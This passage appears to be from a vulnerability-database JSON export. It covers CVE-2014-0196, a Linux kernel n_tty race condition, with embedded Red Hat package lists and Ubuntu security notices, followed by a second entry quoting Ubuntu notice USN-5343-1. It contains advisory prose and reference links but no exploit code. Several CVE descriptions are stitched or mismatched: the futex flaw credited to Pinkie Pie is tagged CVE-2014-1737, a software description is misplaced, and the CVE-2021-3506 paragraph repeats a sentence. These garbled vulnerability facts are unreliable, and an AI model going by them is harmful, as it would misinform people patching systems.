7):\n\nnoarch:\nkernel-doc-3.10.0-123.1.2.el7.noarch.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.1.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-123.1.2.el7.noarch.rpm\n\nppc64:\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-123.1.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-123.1.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm\npython-perf-3.10.0-123.1.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-123.1.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-123.1.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.s390x.rpm\npython-perf-3.10.0-123.1.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.1.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-123.1.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-headers-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm\nperf-3.10.0-123.1.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. ============================================================================\nUbuntu Security Notice USN-2260-1\nJune 27, 2014\n\nlinux-lts-trusty vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-trusty: Block storage devices (udeb)\n\nDetails:\n\nA flaw was discovered in the Linux kernel\u0027s pseudo tty (pty) device. \n(CVE-2014-0196)\n\nPinkie Pie discovered a flaw in the Linux kernel\u0027s futex subsystem. (CVE-2014-1737)\n\nA flaw was discovered in the handling of network packets when mergeable\nbuffers are disabled for virtual machines in the Linux kernel. Guest OS\nusers may exploit this flaw to cause a denial of service (host OS crash) or\npossibly gain privilege on the host OS. (CVE-2014-2568)\n\nA flaw was discovered in the Linux kernel\u0027s ping sockets. \n(CVE-2014-2851)\n\nSasha Levin reported a bug in the Linux kernel\u0027s virtual memory management\nsubsystem. (CVE-2014-3122)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  linux-image-3.13.0-30-generic   3.13.0-30.54~precise2\n  linux-image-3.13.0-30-generic-lpae  3.13.0-30.54~precise2\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      },
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "PACKETSTORM",
        "id": "126578"
      },
      {
        "db": "PACKETSTORM",
        "id": "126822"
      },
      {
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "db": "PACKETSTORM",
        "id": "126729"
      },
      {
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-67689",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0196",
        "trust": 2.9
      },
      {
        "db": "OSVDB",
        "id": "106646",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "59218",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "59262",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "59599",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "33516",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/05/05/6",
        "trust": 1.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "67282",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "126512",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126511",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126503",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "127035",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126578",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126507",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126508",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126603",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126712",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126509",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126510",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126506",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126624",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126500",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-86729",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-67689",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126822",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126729",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127253",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "PACKETSTORM",
        "id": "126578"
      },
      {
        "db": "PACKETSTORM",
        "id": "126822"
      },
      {
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "db": "PACKETSTORM",
        "id": "126729"
      },
      {
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "id": "VAR-201405-0243",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      }
    ],
    "trust": 0.48214287
  },
  "last_update_date": "2024-07-23T20:58:10.245000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "linux-3.14.4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=49773"
      },
      {
        "title": "linux-3.14.4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=49772"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1094232"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2198-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2199-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2203-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-2204-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/106646"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/33516"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/59218"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/59262"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/59599"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2014/dsa-2926"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2014/dsa-2928"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0512.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00007.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00012.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2196-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2197-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2200-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2201-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2202-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2014/05/05/6"
      },
      {
        "trust": 1.7,
        "url": "http://bugzilla.novell.com/show_bug.cgi?id=875690"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=4291086b1f081b869c6d79e5b7441633dc3ace00"
      },
      {
        "trust": 1.7,
        "url": "http://linux.oracle.com/errata/elsa-2014-0771.html"
      },
      {
        "trust": 1.7,
        "url": "http://pastebin.com/raw.php?i=ytsfubgz"
      },
      {
        "trust": 1.7,
        "url": "http://source.android.com/security/bulletin/2016-07-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15319.html"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/4291086b1f081b869c6d79e5b7441633dc3ace00"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0196"
      },
      {
        "trust": 0.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=4291086b1f081b869c6d79e5b7441633dc3ace00"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2014-0196"
      },
      {
        "trust": 0.3,
        "url": "http://linux.oracle.com/errata/elsa-2014-3034.html"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4291086b1f081b869c6d79e5b7441633dc3ace00"
      },
      {
        "trust": 0.3,
        "url": "http://bugzillafiles.novell.org/attachment.cgi?id=588355"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3122"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2851"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1738"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1737"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/site/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0196.html"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-1737.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3122.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0100"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-2851.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0557.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2706"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-2672.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0100.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-2706.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2678"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2672"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-2678.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-1738.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-quantal/3.5.0-49.74~precise1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.2.0-61.93"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.13.0-24.47"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0101"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0520.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0101.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.11.0-20.35"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0678.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-trusty/3.13.0-30.54~precise2"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2260-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2568"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0077"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "PACKETSTORM",
        "id": "126578"
      },
      {
        "db": "PACKETSTORM",
        "id": "126822"
      },
      {
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "db": "PACKETSTORM",
        "id": "126729"
      },
      {
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "PACKETSTORM",
        "id": "126578"
      },
      {
        "db": "PACKETSTORM",
        "id": "126822"
      },
      {
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "db": "PACKETSTORM",
        "id": "126729"
      },
      {
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-05-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "date": "2014-04-29T00:00:00",
        "db": "BID",
        "id": "67282"
      },
      {
        "date": "2014-05-12T18:50:56",
        "db": "PACKETSTORM",
        "id": "126578"
      },
      {
        "date": "2014-05-28T16:37:23",
        "db": "PACKETSTORM",
        "id": "126822"
      },
      {
        "date": "2014-05-06T20:24:17",
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "date": "2014-05-06T20:23:49",
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "date": "2014-05-06T20:24:48",
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "date": "2014-05-21T03:19:22",
        "db": "PACKETSTORM",
        "id": "126729"
      },
      {
        "date": "2014-05-06T20:24:42",
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "date": "2014-06-11T00:09:36",
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "date": "2014-06-27T16:48:32",
        "db": "PACKETSTORM",
        "id": "127253"
      },
      {
        "date": "2014-05-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "date": "2014-05-07T10:55:04.337000",
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "date": "2015-05-07T17:09:00",
        "db": "BID",
        "id": "67282"
      },
      {
        "date": "2023-02-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "date": "2024-02-09T19:24:10.937000",
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "PACKETSTORM",
        "id": "127035"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel n_tty_write \u0027function competition condition vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "competition condition problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      }
    ],
    "trust": 0.6
  }
}

var-202104-1670
Vulnerability from variot

An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. The vulnerability stems from a boundary check failure. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04. ========================================================================== Ubuntu Security Notice USN-5343-1 March 22, 2022

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-kvm: Linux kernel for cloud environments - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)

It was discovered that the aufs file system in the Linux kernel did not properly restrict mount namespaces, when mounted with the non-default allow_userns option set. A local attacker could use this to gain administrative privileges. (CVE-2016-2853)

It was discovered that the aufs file system in the Linux kernel did not properly maintain POSIX ACL xattr data, when mounted with the non-default allow_userns option. A local attacker could possibly use this to gain elevated privileges. (CVE-2016-2854)

It was discovered that the f2fs file system in the Linux kernel did not properly validate metadata in some situations. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19449)

It was discovered that the XFS file system implementation in the Linux kernel did not properly validate meta data in some circumstances. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service. (CVE-2020-12655)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly handle error conditions in some situations, leading to an infinite loop. A local attacker could use this to cause a denial of service. (CVE-2020-25673)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)

It was discovered that the BR/EDR pin-code pairing procedure in the Linux kernel was vulnerable to an impersonation attack. A physically proximate attacker could possibly use this to pair to a device without knowledge of the pin-code. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)

It was discovered that the FUSE user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2020-36322)

It was discovered that the Infiniband RDMA userspace connection manager implementation in the Linux kernel contained a race condition leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possible execute arbitrary code. (CVE-2020-36385)

It was discovered that the DRM subsystem in the Linux kernel contained double-free vulnerabilities. A privileged attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20292)

It was discovered that a race condition existed in the timer implementation in the Linux kernel. A privileged attacker could use this to cause a denial of service. (CVE-2021-20317)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)

It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)

It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033)

It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)

Asaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the Linux kernel did not properly validate large MTU requests from Virtual Function (VF) devices. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33098)

Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. (CVE-2021-34693)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)

